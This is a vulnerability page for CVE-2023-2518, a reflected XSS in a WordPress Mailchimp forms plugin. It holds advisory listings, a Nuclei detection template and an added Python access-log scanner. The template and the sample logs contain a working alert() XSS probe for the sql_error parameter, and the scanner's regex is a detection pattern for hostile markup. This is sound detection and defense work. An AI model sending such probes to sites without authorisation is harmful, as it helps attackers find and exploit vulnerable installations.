| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2023-2518 | 19 Mar 2025 21:02 | – | circl |
| WordPress plugin Easy Forms for Mailchimp cross-site scripting vulnerability | 30 May 2023 00:00 | – | cnnvd |
| CVE-2023-2518 | 30 May 2023 07:49 | – | cve |
| CVE-2023-2518 Easy Forms for Mailchimp < 6.8.9 - Reflected XSS | 30 May 2023 07:49 | – | cvelist |
| CVE-2023-2518 | 30 May 2023 08:15 | – | nvd |
| WordPress Easy Forms for Mailchimp Plugin < 6.8.9 Multiple Vulnerability | 16 Jun 2023 00:00 | – | openvas |
| Cross site scripting | 30 May 2023 08:15 | – | prion |
| PT-2023-19962 · WordPress · Easy Forms For Mailchimp | 30 May 2023 00:00 | – | ptsecurity |
| CVE-2023-2518 | 23 May 2025 01:53 | – | redhatcve |
| CVE-2023-2518 Easy Forms for Mailchimp < 6.8.9 - Reflected XSS | 30 May 2023 07:49 | – | vulnrichment |
```yaml
id: CVE-2023-2518

info:
  name: WordPress Easy Forms for Mailchimp Plugin < 6.8.9 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Easy Forms for Mailchimp plugin before version 6.8.9 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the sql_error parameter before outputting it back in the page when the debug option is enabled, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Attackers can inject malicious JavaScript through the sql_error parameter when debug mode is enabled, potentially stealing administrator session cookies and gaining full control over the WordPress site.
  remediation: |
    Update Easy Forms for Mailchimp plugin to version 6.8.9 or later that properly sanitizes and escapes the sql_error parameter before output.
  reference:
    - https://wpscan.com/vulnerability/ca120255-2c50-4906-97f3-ea660486db4c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2518
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2518
    cwe-id: CWE-79
    epss-score: 0.15068
    epss-percentile: 0.947
    cpe: cpe:2.3:a:yikesinc:easy_forms_for_mailchimp:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: yikesinc
    product: easy_forms_for_mailchimp
    fofa-query: body="wp-content/plugins/yikes-inc-easy-mailchimp-extender/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,xss,yikes-inc-easy-mailchimp-extender,authenticated,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the plugin from the front page before doing anything else.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "yikes-inc-easy-mailchimp-extender"
        internal: true

  # Request 2: authenticate, then request the edit-form admin page with the probe in sql_error.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg/onload=alert(document.domain)>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022018f4b8a18308d1814b3ffe924e863f67c2830550ae0e3ddb9ef6c88bb38418e1022100a8f451c6561219ba78b091f4b458f8c430c31e1a0617b7b6efb35de3ffa5b7dd:922c64590222798bb761d5b6d8e72950
```
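The template's probe is an unescaped sql_error value reflected into the yikes-mailchimp-edit-form admin page, so the same parameter is what a defender should watch for in web-server access logs. The following Python is an added example, not code from the Vulners page or the Nuclei project; the log lines, the `LOG_RE` parser and the `MARKUP_RE` heuristic are constructed for illustration and handle both single- and double-URL-encoded values.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed combined-format access-log sample (TEST-NET addresses), not from any real host.
SAMPLE_LOG = """\
203.0.113.5 - - [30/May/2023:08:20:01 +0000] "GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [30/May/2023:08:20:02 +0000] "GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=Duplicate+entry+for+key HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
198.51.100.7 - - [30/May/2023:08:21:10 +0000] "GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=%253Csvg%2520onload%253Dalert%25281%2529%253E HTTP/1.1" 200 5130 "-" "curl/8.0"
198.51.100.7 - - [30/May/2023:08:22:00 +0000] "GET /wp-admin/admin.php?page=yikes-inc-easy-mailchimp HTTP/1.1" 200 4000 "-" "curl/8.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that points to an XSS probe rather than a plain database error message.
MARKUP_RE = re.compile(r'<\s*[a-z!/]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)


def suspicious_sql_error(target: str) -> Optional[str]:
    """Return the decoded sql_error value when it carries HTML/JS markup, else None."""
    parts = urlsplit(target)
    if parts.path != "/wp-admin/admin.php":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("page") != ["yikes-mailchimp-edit-form"] or "sql_error" not in qs:
        return None
    value = qs["sql_error"][0]  # parse_qs has already decoded one layer of %-encoding
    # Check the once-decoded value and a second decoding, so double-encoded probes are caught too.
    for candidate in (value, unquote_plus(value)):
        if MARKUP_RE.search(candidate):
            return candidate
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per request whose sql_error parameter looks like markup."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = suspicious_sql_error(m["target"])
        if hit is not None:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "payload": hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit shows only that a probe was sent: the reflection happens only when the plugin's debug option is on and the request is made by a logged-in administrator, so confirm against the response body or the plugin version before treating it as a successful exploit.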